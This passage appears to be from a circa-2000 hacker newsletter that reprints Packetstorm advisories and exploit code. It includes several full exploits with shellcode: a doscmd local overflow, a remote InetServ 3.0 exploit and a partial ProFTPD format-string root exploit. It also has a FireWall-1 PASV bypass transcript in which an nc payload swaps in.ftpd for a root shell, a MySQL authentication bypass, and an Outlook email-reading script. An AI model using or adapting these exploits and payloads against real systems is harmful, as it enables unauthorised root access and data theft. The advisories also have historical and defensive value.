"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; char *buf, *p; int noplen, i, ofs, align; long ret, *ap; FILE *fp; if(!(buf = (char *)malloc(BUFSIZE+1))) { perror("malloc()"); return -1; } if (argc < 3) { fprintf(stderr, "usage: %s ofs align\n", argv[0]); exit(0); } ofs = atoi(argv[1]); align = atoi(argv[2]); noplen = BUFSIZE - strlen(execshell); ret = getesp() + ofs; memset(buf, NOP, noplen); buf[noplen+1] = '\0'; strcat(buf, execshell); setenv("EGG", buf, 1); free(buf); if(!(buf = (char *)malloc(ADDRS+align+1))) { perror("malloc()"); return -1; } memset(buf, 'a', align); p = &buf[align]; ap = (unsigned long *)p; for(i = 0; i < ADDRS / 4; i++) *ap++ = ret; p = (char *)ap; *p = '\0'; fprintf(stderr, "ret: 0x%x\n", ret); execl("/usr/bin/doscmd", "doscmd", buf, 0); return 0; } @HWA 172.0 FireWall-1 FTP Server Vulnerability Background Paper #1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: (Windows application attack) PAPER FireWall-1 FTP Server Vulnerability Background Paper #1, data protect AG John McDonald <jm@dataprotect.com> Thomas Lopatic <tl@dataprotect.com> References ---------- Please reference the recent vuln-dev posting by Mikael Olsson entitled, "Breaking through FTP ALGs -- is it possible?" At the time of this writing, it was not yet archived on the security focus web site. Introduction ------------ The basic idea of the described attack is to subvert the security policy implemented by a stateful firewall. This is done by triggering the generation of a TCP packet that, when inspected by the firewall, will change the firewall's internal state such that an attacker is able to establish a TCP connection to a filtered port through the firewall. This packet is the server response to a PASV user request during a FTP session. We have also come across this attack, and were in the process of preparing a more comprehensive advisory, including other FireWall-1 security issues we have documented. The idea was to notify Check Point of these problems and give them time to develop a software update. However, since the general form of this vulnerability was independently documented by Mikael Olsson and published to the vuln-dev mailing list, we feel it is appropriate to distribute this information now, as it relates specifically to FireWall-1, in order to alert potential victims to this issue. Description ----------- Check Point FireWall-1 is vulnerable to an attack involving the stateful support for the FTP protocol, specifically the handling of the PASV command. Typically, a user will send an FTP server the PASV command, and the response from the FTP server will be the 227 message specifying to which destination IP address and destination port the client is expected to connect for the next data connection. FireWall-1 monitors the packets sent from the FTP server to the client, looking for the string "227 " at the beginning of each packet. Upon a match, FireWall-1 will extract the destination IP address and the destination port given in the packet payload, verify that the specified IP address corresponds to the source address of the packet, and allow an incoming TCP connection through the firewall according to the destination IP address and the destination port extracted from the datagram. There are several restrictions on this connection which limit its utility. Data can only travel in one direction and it cannot be to a port that is listed in FireWall-1's list of well-known TCP services. It is important to note that FireWall-1 version 3 does not have this limitation, connections can be made to any port, and the flow of data is not managed. In order to trick FireWall-1 into allowing a connection to a port on the FTP server, we must have the server send the "227 " string as the first four bytes in a packet that, according to its source port, belongs to a FTP control connection. We can typically accomplish this by using the error handler of the FTP daemon, in conjunction with limiting the MSS of our TCP connection. This is easy to do by setting the MTU of our interface to a small value we can work with, before we establish a control connection to the victim FTP server. This causes the return packets from the server to be smaller, allowing us to control more easily how data is split into packets. Thus, we can make the "227 " message returned by the error handler appear at the beginning of a packet. Another way to accomplish this would be to ACK up to the message we want to receive, and then have the server retransmit the data we want to be contained in an isolated packet. Here is an example of an attack based on this technique. There is a FireWall-1 machine between gumpe and the 172.16.0.2 server, which only permits incoming FTP connections. 172.16.0.2 is a default Solaris 2.6 install, with the Tooltalk Database vulnerability. We send the datagram directly to the service's TCP port, in spite of this port being blocked by the firewall. Note that since there is no response expected, the one-way restriction doesn't affect this attack. All of our testing was done on a Nokia IPSO machine running FW-1 version 4.0.SP-4. [root@gumpe /root]# strings hackfile localhost """"3333DDDD/bin/ksh.-c.cp /usr/sbin/in.ftpd /tmp/in.ftpd.back ; rm -f /usr/sbin/in.ftpd ; cp /bin/sh /usr/sbin/in.ftpd [root@gumpe /root]# /sbin/ifconfig eth0 mtu 100 [root@gumpe /root]# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open 220 sol FTP server (SunOS 5.6) ready. ...........................................227 (172,16,0,2,128,7) 500 '........................................... [1]+ Stopped nc -vvv 172.16.0.2 21 [root@gumpe /root]# cat killfile | nc -vv 172.16.0.2 32775 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 32775 (?) open sent 80, rcvd 0 [root@gumpe /root]# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open 220 sol FTP server (SunOS 5.6) ready. ...........................................227 (172,16,0,2,128,7) 500 '........................................... [2]+ Stopped nc -vvv 172.16.0.2 21 [root@gumpe /root]# cat hackfile | nc -vv 172.16.0.2 32775 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 32775 (?) open sent 1168, rcvd 0 [root@gumpe /root]# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open id uid=0(root) gid=0(root) There is an easier way to perform a similar attack on this setup, since the default Solaris FTP daemon allows a bounce attack, but this should suffice to demonstrate the potential severity of this problem. Summary ------- If you have a FTP server behind a FireWall-1, it is possible for an attacker to open TCP connections to certain ports on the machine, and perform limited communication with those services. If you are running FireWall-1 version 3, you should consider your FTP server to have no TCP filtering. Solving this problem is inherently difficult, but there are simple steps to take to minimize this risk. If the machine is properly hardened, i.e. if there are no services available on it, apart from FTP, this makes this vulnerability have little significance. You can also disable the PASV handling in the FireWall-1 GUI. However, this breaks your configuration for passive FTP clients. @HWA 173.0 Fool firewalls into opening their ports with PASV ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: Multiple firewalls: FTP Application Level Gateway "PASV" Vulnerability Synopsis -------- It is possible to cause certain firewalls to open up any TCP port of your choice against FTP servers that are "protected" by those firewalls. This is done by fooling the FTP server into echoing "227 PASV" commands out through the firewall. Known affected firewalls ------------------------ Firewall-1 v3 allows full communication on the opened port Firewall-1 v4 allows only inbound communication on the opened port NOTE: THIS IS LIKELY A PROBLEM WITH MANY FIREWALLS, DO NOT TAKE FOR GRANTED THAT YOUR FIREWALL IS SAFE JUST BECAUSE IT IS NOT LISTED HERE Background ---------- I've had this idea since late -98, but haven't gotten around to doing anything about it. Recently, I posted a "possible vulnerability" to vuln-dev@securityfocus.com, outlining my ideas. This resulted in multiple responses from different people saying that they had experienced attacks like this. It would seem that I should have gone public with my concerns a lot sooner, rather than having people frown upon them in private. For my original, somewhat unstructed, thought process, entitled "Breaking through FTP ALGs -- is it possible?", see: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-8&msg=389FEB7B.AA290CC7@enternet.se For an immediate confirmation regarding FW-1 v3 and v4 from John McDonald, jm@dataprotect.com, and a real-life attack, entitled "FireWall-1 FTP Server Vulnerability", see: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-8&msg=38A1B2D9.3B244FAB@dataprotect.com [Note: URLs are most likely wrapped] This attack is most likely to work against stateful inspection firewalls protecting servers. It might also be possible to cause "proxy" like firewalls to open arbitrary ports to protected servers. In the extreme case, albeit a tad unlikely, it may be possible to cause any type of firewall to open arbitrary ports against FTP clients. Take care, all -- Mikael Olsson, EnterNet Sweden AB, Box 393, S-891 28 ÖRNSKÖLDSVIK Phone: +46 (0)660 105 50 Fax: +46 (0)660 122 50 Mobile: +46 (0)70 248 00 33 WWW: http://www.enternet.se E-mail: mikael.olsson@enternet.se @HWA 174.0 InetServ 3.0 remote DoS exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: Home page: http://www.raza-mexicana.org --=0---=0---=0---=0---=0---=0---=0---=0 POWERED by Linux eXtreme V1.1 --=0---=0---=0---=0---=0---=0---=0---=0 RaZa MeXiCaNa TeAm w w w . r a z a - m e x i c a n a . o r g ------------------------------------------------------------------ |D3VIL OF THE NET | - | THE FINAL DAY IS HERE| -----BEGIN PGP MESSAGE----- Version: 2.6.3i owGtkcFKw0AQhsWT7FP8L5BcvAmCId2SQLKWGCT2YNl2x7La3YVNxFb6Sr6jY0C0 J0HyDf/h/2dght2P8+f1hYmrJ2P7lzMGv0iY6z/5mhI4pUGGJQuoIdGhRM5OjQla jjLU4p+rhNKOrvB99COEdNrufpKbtQ39oU89DaIIjhZ6y/M+CJFMichDiMZ6bUKE oR0WMRxoMwRU1r/uQd0QyZFo9FKjps7mWmm0lDngbawUERrvrAQOhD0sNuw8K0Xg 7naCk0//ZnZ5X1a4naMtJJRsceTlx9HNS5VVmGUPKO9QyEZO+14Qnw== =An72 -----END PGP MESSAGE----- --------------63FC237A4CB8A83445A20326 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit <!doctype html public "-//w3c//dtd html 4.0 transitional//en"> <html> HI sorry,,, a person posts this exploit made for WIn32.... <br>i coded the same exploit, but it's compile in UNIX ,,, <p>c-u <br>thx <br> <pre>-- ----------------------------------------------------------------------------- --=0---=0---=0---=0---=0---=0---=0---=0 POWERED by Linux eXtreme V1.1 --=0---=0---=0---=0---=0---=0---=0---=0 RaZa MeXiCaNa TeAm w w w . r a z a - m e x i c a n a . o r g ------------------------------------------------------------------ |D3VIL OF THE NET | - | THE FINAL DAY IS HERE| -----BEGIN PGP MESSAGE----- Version: 2.6.3i owGtkcFKw0AQhsWT7FP8L5BcvAmCId2SQLKWGCT2YNl2x7La3YVNxFb6Sr6jY0C0 J0HyDf/h/2dght2P8+f1hYmrJ2P7lzMGv0iY6z/5mhI4pUGGJQuoIdGhRM5OjQla jjLU4p+rhNKOrvB99COEdNrufpKbtQ39oU89DaIIjhZ6y/M+CJFMichDiMZ6bUKE oR0WMRxoMwRU1r/uQd0QyZFo9FKjps7mWmm0lDngbawUERrvrAQOhD0sNuw8K0Xg 7naCk0//ZnZ5X1a4naMtJJRsceTlx9HNS5VVmGUPKO9QyEZO+14Qnw== =An72 -----END PGP MESSAGE-----</pre> </html> --------------63FC237A4CB8A83445A20326-- --------------B105FA723A5B39CE8CFB14A1 Content-Type: text/plain; charset=us-ascii; name="inetserv-exp.c" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="inetserv-exp.c" /********************************************************************** InetServ 3.0 (Windows NT) REMOTE EXPLOIT CODEd by dr_fdisk^ *********************************************************************** CLASE: DENIAL OF SERVICE BUG/SHELLCODE FOUND by: Greg Hoglund ))))))))))))(((((((((((( )))RaZa MeXiCaNa TeAm((( ))))))))))))(((((((((((( w w w . r a z a - m e x i c a n a . o r g (((((((((((((((((((((((((((((((((((((((((( ************************************************************************ Aclaracion: el exploit lo programe porque lo necesitaba usar bajo Unix y no en entorno Windows como fue presentado. ************************************************************************/ /*********************************************************************** -----BEGIN PGP MESSAGE----- Version: 2.6.3i owGtkMFKw0AQhtXjPsX3AimIN9HDkm5pIIkSg8QeKmt3lUWThbVilb6S7+iYkz0J km/4D//MwAz/18nFw/HpkcAvMuHyT362FIc0aFYiqDB0FOTi6rFDKy1Npf55StW2 9+e4dP/owuvzGqWyKVF5jMmFwbqYcP6F6xQ//GYbKcPwtsN32+R7rxq7slS+C7mt La3XPbyPNSNh+RRl9Hh2BDbiBtGMKNOnCV4+zHx+dluUXC1ol4batOzl+H50i6LW JXN9R3HD0jRm2rwk/28= =92LB -----END PGP MESSAGE----- ************************************************************************/ /*------------------------------* * DEFINIR EL PUERTO DEFAULT */ /*------------------------------*/ #define PUERTO 224 #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> /*------------------------------* * COLORES DEFINIDOS */ /*------------------------------*/ #define NORMAL "\E[m" #define VERDE "\E[32m" #define BRILLOSO "\E[1m" #define ROJO "\E[31m" #define CELESTE "\E[36m" #define AZUL "\E[34m" char shellcode[] = "GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAABBBBAAAACCCCAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAADDDDAAAAEEEEAAAAAAAAAAA" \ "\xB8\xFF\x1F\xED\x12\x2C\xFF\xC1\xC0\x18\x8B\xD8" \ "\x33\xC9\xB1\x46\x48\x80\x30\x80\x49\x75\xF9" \ "\x53\xB8\x48\x77\x78\x77\xBA\x77\x77\x77\x77" \ "\x33\xC2\x50\x33\xC0\x50\xB8\xAE\x9B\x65\x77\x33\xC2\x50" "\xB8\x75\x77\x77\xF7\x33\xC2\x50\xB8\x7B\xA7\x34\x77" \ "\x33\xC2\xFF\x10\x8B\xFB\xBA\x77\x77\x77\x77" \ "\xB8\x63\x9A\x65\x77\x33\xC2\x2B\xD8\x53\x50" \ "\x6A\x01\x33\xC9\x51\xB8\x70\x9A\x65\x77" \ "\x33\xC2\x50\xFF\x37\xB8\x77\xA7\x34" \ "\x77\x33\xC2\xFF\x10\xCC"\ "AAAAAAAAAAAAAAA" \ "\x90\x90\xEB\x80\xEB\xD9\xF9\x77" \ "\xDC\xD3\xCF\xC6\xD4\xD7\xC1\xD2\xC5\xDC\xCD\xE9\xE3\xF2" \ "\xEF\xF3\xEF\xE6\xF4\xDC\xD7\xE9\xEE\xE4\xEF\xF7\xF3\xDC\xC3" \ "\xF5\xF2\xF2\xE5\xEE\xF4\xD6\xE5\xF2\xF3\xE9\xEF\xEE\xDC" \ "\xD2\xF5\xEE\x80" \ "\xDF\xD5\xD2\xDF\xC8\xC1\xD8\xCF\xD2\xC5\xC4\xDF\x80" \ "\xE3\xED\xE4\xAE\xE5\xF8\xE5\xA0\xAF\xE3\x80\x80\x80\x80\x80"; void victima(char *conn22); int conexion; void victima(char *conn22) { struct sockaddr_in sin; struct hostent *hp; hp = gethostbyname(conn22); if (hp==NULL) { printf("%s%sEl host %s no existe!!!!\n",ROJO,BRILLOSO,conn22); exit(0); } bzero((char*) &sin, sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(PUERTO); conexion = socket(AF_INET, SOCK_STREAM, 0); connect(conexion,(struct sockaddr *) &sin, sizeof(sin)); } void main(int argc, char **argv) { char buffer[1500]; int a; char salida[50]; if (argc != 2) { system("clear"); printf("\n\n\n\n"); printf("%s%s InetServ 3.0 (Windows NT) REMOTE EXPLOIT CODEd by dr_fdisk^\n",VERDE,BRILLOSO); printf("%s----------------------------------------------------------------------\n\n",CELESTE); printf ("%s RaZa MeXiCaNa TeAm %swww.raza-mexicana.org\n\n",ROJO,CELESTE); printf ("-------===============================-------\n\n\n"); printf("Uso: %s%s <hostname>\n\n",AZUL,argv[0]); exit(0); } printf("%s%sVictima: %s \n"NORMAL,ROJO,BRILLOSO,argv[1]); printf("%s----------------------------------------------------"NORMAL,AZUL); victima(argv[1]); sprintf(buffer,"%s",shellcode); send(conexion, buffer, strlen(buffer), 0); printf("%s%s%sTHE END\n\n",NORMAL,VERDE,BRILLOSO); } /*********************************THE END************************************/ @HWA 175.0 ppp 1.6.14 shows local user the saved PPP password ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: here exists a bug in kppp 1.6.14 where a local user dialing up into the internet can copy the stars in the password box and put them into an xterm where the stars will be unrevealed and that password will be shown. seeya rarez rarez@bonbon.net (Seems unlikely, like Revelation?? -Ed) @HWA 176.0 Another screw up in MS's Java Virtual Machine, breaks security. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: Jan 28, 2000 Translator's note: We announce another security hole of Microsoft Virtual Machine$B!!(B (Microsoft VM) for Java, including the latest version. This is the translation version of the warning note (written in Japanese) by Dr. Hiromitsu Takagi posted at the Java House Mailing List, a Japanese Java user discussion site (http://java-house.etl.go.jp/ml/ . Japanese fonts required to display). The finding is summarized after numerical tests and discussion among the members. Mr. Kensuke Tada originated the discussion. The translation is made available by Dr. Tomohira Tabata (ttabata@ucsd.edu) for his friends and others who may be benefit from the information. Please note that Dr. Tomohira Tabata has no responsibility on mistranslation on this document. The finding is: This security vulnerability allows a Java applet to read out any files on certain directories. A simple code attacks the security hole. Since a beginning Java programmer can exercise one, all users should be noted. Its vulnerability is quite dangerous and immediate de-activation of IE Java function provided by Microsoft is highly recommended; possibly changing to Netscape Navigator, Communicator or Sun Java Plug-in by the time Microsoft providing a "fix". The body of the warning note by Dr. Hiromitsu Takagi: ---------------------------------------------------------------------------------------------------------- This is a warning for all users of Microsoft Internet Explorer version 4 and 5 (IE4, IE5) for Microsoft Windows95/98/NT. This security hole is closely CLASSPATH for Java users and especially for the Java Developer; the note is posted. Vulnerability ------------- This security vulnerability allows a Java applet to read any "known files", which are common to most configuration. A hosted web site is able to retrieve file information through the applet code automaticallyspecific files which popular applications hold, and files with common names which users occasionally choose, This does not allow any change or deletion of local files. We still believe this vulnerability is quite dan Detail description ------------------ The readable directories and their sub directories could be limited,will be read, Except of Windows NT that is home directory of each user profile set. C:\Windows\desktoWe suspect this variation comes from the version of Microsoft VM for Java, not the version of IE. Unfortunately as a much serious case, if you set the environment variable CLASSPATH at C:\AUTOEXEC.BAT, the files and directories under the directories set in CLASSPATH are all readable. Java programmers should be aware of tfor their applications. How to be attacked ------------------ You may get attacked indeed just accessing When accessing the web site, the applet is downloaded and invoked on your computer, and then sends files on InputStream is = ClassLoader.getSystemResourceAsStream(filename); This single line makes an applet read an email. There would be already such an applet made by a malicious programmer, and placed on a web page in secret. Demonstration of attacking the security hole -------------------------------------------- You can try a demonstration applet on the following URL, (don't worry, it just reads you back your e.g. autoexec.bwill see the content with specifying the file name with the directory name. When you receive the message "to read or find the specified file. However, this might means only that the applet searched the different d(rive?) Work-around ----------- Stop Microsoft's Java function until a patch provided. Instruction for IE4 users: Follow "View" menu, "Internet Options...", "Security" tab, "Custom (for expert users)", and "Setting..." bAlternative for utilizing Java: - Use Netscape Navigator or Communicator instead of IE. - Use Sun Java Plug-in for IE. See http://java.sun.com/products/plugin/index.html List of vulnerable applications with versiothe members ------------------------------------------------------------------------------------ Microsoft (R) VM for Java, 5.0 Release 5.0.0.3234 (the latest version, as of Jan 28, 2000) and earlier Note that no sNo. This is a simple mis-implementation (a bug) of Microsoft Java VM. It does NOT mean Java has a structural Motivation of this note ----------------------- We are aware that full disclosure of security holes informpeople informed. After fighting this dilemma, we believe the benefit of users, such as awareness of existing(See the following URLs). http://www.news.com/News/Item/0,4,41084,00.html?feed.cnetbriefs http://news.cnet.c - This issue is already known by thousands of members of our mailing list. Even if we hid the code, anyone them to provide a patch immediately, and to announce it on media such as newspaper so that all of Windows us The following is the Microsoft's response; -- Due to development issue, we can not guarantee to fix it as From this answer, we could not be convinced if users get secured soon. In addition, they mentioned they coulthis issue to Java communities (Translator's note: Dr. Takagi gave Microsoft Corp. in Japan a call on Jan 2Acknowledgement) --------------- This security hole is happened to be found when we discussed programming method to read files on Jar archives. As a start point, Mr. Tada reported his applet read files on Desktop unereport, Mr. Amemiya indicated it was a security hole. I, Dr. Takagi, reported readable directories were not Related articles ---------------- [j-h-b:30281] [j-h-b:30283] [j-h-b:30284] [j-h-b:30285] [j-h-b:30303] [j-h-b:30321] [j-h-b:30323] [j-h-b:30324] [j-h-b:30325] [j-h-b:30327] [j-h-b:30331] [j-h-b:30332] [j-h-b:30333] [j-h-b:30334] [j-h-b:30338] [j-h-b:30351] [j-h-b:30352] [j-h-b:30353] [j-h-b:30354] [j-h-b:30355] [j-h-b:3http://www.etl.go.jp/~takagi/ Acknowledgement from translator ------------------------------- I would like to thank Dr. Hiromitsu Takagi (takagi@etl.go.jp) and Mr. Ryoji Sumida (ryo@idt.net) for kind helps. Tomohira Tabata (ttabata@ucsd.edu), Ph.D., postgraduate research engineer, ECE UCSD, 9500 Gilman Drive, La Jolla, CA 92093-0407, USA @HWA 177.0 mySQL password checking routines insecure. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: Hi, Below you find a security advisory i wrote concerning a vulnerability found in all (known to me) mysql server versions, including the latest one. As mysql is a widely used sql platform, i strongly advise everyone using it to read it, and fix where appropriate. This email has been bcc'd to the mysql bug list, and other appropriate parties. Greets, Robert van der Meulen/Emphyrio .Introduction. There exists a vulnerability in the password checking routines in the latest versions of the MySQL server, that allows any user on a host that is allowed to connect to the server, to skip password authentication, and access databases. For the exploit to work, a valid username for the mysql server is needed, and this username must have access to the database server, when connecting from the attacking host. .Vulnerable Systems. All systems running 3.22.26a and up (tested). Probably all systems running lower versions as well (not tested, not reviewed). All versions are vulnerable on all platforms. .A snippet of code from the mysql code, explaining password authentication ** >From mysql-3.22.26a/sql/password.c: /* password checking routines */ /***************************************************************************** The main idea is that no password are sent between client & server on connection and that no password are saved in mysql in a decodable form. On connection a random string is generated and sent to the client. The client generates a new string with a random generator inited with the hash values from the password and the sent string. This 'check' string is sent to the server where it is compared with a string generated from the stored hash_value of the password and the random string. <cut> *****************************************************************************/ .More code, and vulnerability explanation. The problem is, that in the comparison between the 'check' string, and the string generated from the hash_value of the password and the random string, the following code is used (from mysql-3.22.26a/sql/password.c): while (*scrambled) { if (*scrambled++ != (char) (*to++ ^ extra)) return 1; /* Wrong password */ } 'scrambled' represents the 'check' value, and (*to++ ^ extra) walks trough the hash_value. Suppose a client would send a _single_ character to the server as the 'check' string. Of course the server should notice the check string is not the same length as the check string needed, and give a password error. Because no such checks are done, when a check string of length 1 is passed to the server, only one character is compared. So the only thing that remains to know if we want to peek in someone's MySQL database, is a technique to find out the first character of the server-side check string. The string that's used for the comparison is generated using some random data, so two following authenticate-actions will probably use different check-strings. After looking at the algorithm, generating the check string, it becomes clear that there are actually only 32 possibilities for each character. In practice, this means that if you connect, sending one single character as the check string, you will be in in about 32 tries maximum. .Impact. Hosts in the access list (by default any host, on a lot of distributions and servers) can connect to the MySQL server, without a password, and access (often sensitive) data _as long as the attacker has a valid username for the database server_. This vulnerability also incorporates a MySQL DoS attack, as the attacker can shutdown database servers and delete data, if she logs in with the MySQL management account. .Exploit information. I have an exploit available, but to defer script kiddies i will not release it (yet). Do not ask me for it. If above explanation is understood, an exploit should be easy enough... .Fix information. Change the routine 'check_scramble' in mysql-3.22.26a/sql/password.c to do a length check, _before_ starting the compare. This should be as easy as inserting the following just above the while (*scrambled) loop: if (strlen(scrambled)!=strlen(to)) { return 1; } WARNING: This is NOT an official fix. You can use this as a temporary solution to the problem. Please check the official mysql site (www.mysql.org) for a fix. .Commentary. I think this exploit should not be a very scary thing to people that know how to secure their servers. In practice, there's almost never a need to allow the whole world to connect to your SQL server, so that part of the deal should be taken care of. As long as your MySQL ACL is secure, this problem doesn't really occur (unless your database server doubles as a shell server). We have also located several other security bugs in mysql server/client. These bugs can only be exploited by users who have a valid username and password. We will send these to the mysql maintainers, and hope they'll come with a fix soon. Yours, Robert van der Meulen/Emphyrio (rvdm@cistron.nl) Willem Pinckaers (dvorak@synnergy.net) -- | rvdm@cistron.nl - Cistron Internet Services - www.cistron.nl | | php3/c/perl/html/c++/sed/awk/linux/sql/cgi/security | | My statements are mine, and not necessarily cistron's. | @HWA 178.0 Guninski: Outlook and Active Scripting (again, sigh...) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: Georgi Guninski security advisory #6, 2000 Outlook Express 5 vulnerability - Active Scripting may read email messages Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof. Description: Outlook Express 5.01 and Internet Explorer 5.01 under Windows 95 (suppose other versions are also vulnerable) allow reading subsequently opened email messages after a hostile message is opened. Details: The problem is assigning the document object of the email message to a variable in a newly opened window. Thru this variable access is possible to open email messages. The code that must be included in HTML message is : --------------------------------------------------------------------- <SCRIPT> a=window.open("about:<A HREF='javascript:alert(x.body.innerText)' >Click here to see the active message</A>"); a.x=window.document; </SCRIPT> --------------------------------------------------------------------- Workaround: Disable Active Scripting Regards, Georgi Guninski http://www.nat.bg/~joro @HWA 179.0 Break a BeOS poorman server remotely with url infusion ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: Missing traling '/' Remote Denial of Service Attack Advisory [february 5th 2000] UPDATED February 8th ############################################################### Please, refer to http://bebugs.be.com/devbugs/detail.php3?oid=1229984 as it makes this advisory obsolete... I discovered this very recently, but it seems it was in the Be inc. bug database for a while. Thanks goes to Kobie Lurie for giving me additional informations. ############################################################### ##### OLD ADVISORY HERE ##### Software: PoorMan webserver Platform: BeOS R4.5 (i386) Note: The following has not been test over the PPC platform, please, let me know if you are able the reproduce it! Author: Jonathan Provencher oktober@balistik.net http://balistik.net Details: It is possible to cause the PoorMan webserver to crash (remotly)by sending a given URL to the server. In the case that interests us, a URL like http://server.com/somedir would make the server crash and output a Segment Violation in the 'web connection thread'. It seems it is the way that the server handles and parse the urls that makes him vulnerable. Adding a trailing '/' would not make the server to crash. I discovered this very recently, but it seems it was in the Be inc. bug database for a while. Thanks goes to Kobie Lurie for giving me additional informations. Sorry for any redundant alert! ;) Situation: The vendor (Be inc.) has not and will not be contacted for this vulnerability. This DoS can be worked around by installing the 4.5.2 service pack provided freely by Be inc. PoorMan's users should really consider installing this service pack. Relevant links: R4.5.2 Service Pack http://www-classic.be.com/support/updates/ Be inc. http://www.be.com ###################### @HWA 180.0 Proftpd (<= pre6) linux ppc remote exploit. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Author: lamagra@uglypig.org Packetstorm: /* PRIVATE Do not distribute PRIVATE oktober 1999 pro-ftpd remote exploit (linux ppc) Bug: Proftpd (<= pre6) passes user commands to snprinft(). snprintf(argv,len,command + host + etc); This makes it possible to insert formatstrings. %n: writes the number of chars written to the location pointed to by it's argument. Stack: [ user argument ] [ other stuff ] [ arguments + stack of the snprintf funtion + subfunctions ] We walk to all that garbage using %u and stop at a certain possition inside the usercommand. At that possition is the address that will be overwritten by %n. Exploit is simple we overwrite the uid and the anonconfig. After a uid change by LIST. We are root :-) Exploit: Linuxppc has a bad char (newline) in the address of session.anonconfig. This is why I overwrite DenyAll inside the config, But this area in memory is allocated and therefore unpredictable on a remote box. This is needed to get write access on the server (within the chroot-env). o Anonymous login: you can overwrite anything in /home/ftp. Getting out of the chroot-enviroment is impossible since proftpd doesn't use external program (to overwrite). hint: use .forward in combination with a suid file. o Local login: instant root by changing permission to suid. hint: SITE CHMOD 6755 <file> (is allowed in proftpd, not in wuftpd) I plugged this exploit in the ftp program, because this program doesn't have data-connection support. Because it's not really needed. I used this bug to get root on linuxppc but they never gave me credit for it. I made a x86 exploit too, but i don't have any rpm-addy's. Only my testing vals. I heard RH6.x comes with proftpd, anyone wanna let me get the addy's? mail me. Greets to grue, lockdown, DryGrain by lamagra <lamagra@uglypig.org> http://lamagra.seKure.de http://penguin.seKure.de */ #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <sys/types.h> #include <netdb.h> #define NUM 150 #define DEFAULT_OFFSET 0 unsigned long resolve(char *); void usage(char *); void wait_msg(int); void ftplogin(int, char *, char *); void shell(int); extern char *optarg; extern int optind; void main(int argc, char **argv) { struct sockaddr_in addr; int sockfd,i; long port=21,*addrptr; char c, name[100],pass[100],buf[1024]; /* SET DEFAULTS */ strcpy(name,"ftp"); strcpy(pass,"h@ck.er"); while((c = getopt(argc,argv,"hn:p:c:")) != EOF) { switch(c) { case 'h': usage(argv[0]); case 'n': strncpy(name,optarg,100); break; case 'p': strncpy(pass,optarg,100); break; case 'c': port = atol(optarg); } } if((argc - optind) != 1) usage(argv[0]); bzero(&addr, sizeof(struct sockaddr_in)); addr.sin_family = AF_INET; addr.sin_port = htons(port); addr.sin_addr.s_addr = resolve(argv[optind++]); printf("Connecting....."); if((sockfd = socket(AF_INET,SOCK_STREAM,0)) == -1) { printf("failed\n"); perror("socket"); exit(-1); } if(connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) { printf("failed\n"); perror("connect"); exit(-1); } #ifdef DEBUG sockfd = fileno(stdout); #endif wait_msg(sockfd); printf("success\n"); printf("Logging in <%s>:<%s>\n",name,pass); ftplogin(sockfd,name,pass); strcpy(buf,"PWD aaaa"); /* Overwrite config to allow writing * 0x0187e608: session.anon_config, bad char in 0x0187e60a * DenyAll is at 0x1885f01 on the box i used for testing * It just fucks up the string -> DenyAll isn't found -> default is AllowAll */ buf[8] = 0x01; buf[9] = 0x88; buf[10] = 0x5f; buf[11] = 0x01; /* session.disable_idswithing is at 0x187e5ca */ buf[12] = 0x01; buf[13] = 0x87; buf[14] = 0xe5; buf[15] = 0xca; /* Ugly, Ugly / didn't feel like counting :-) */ 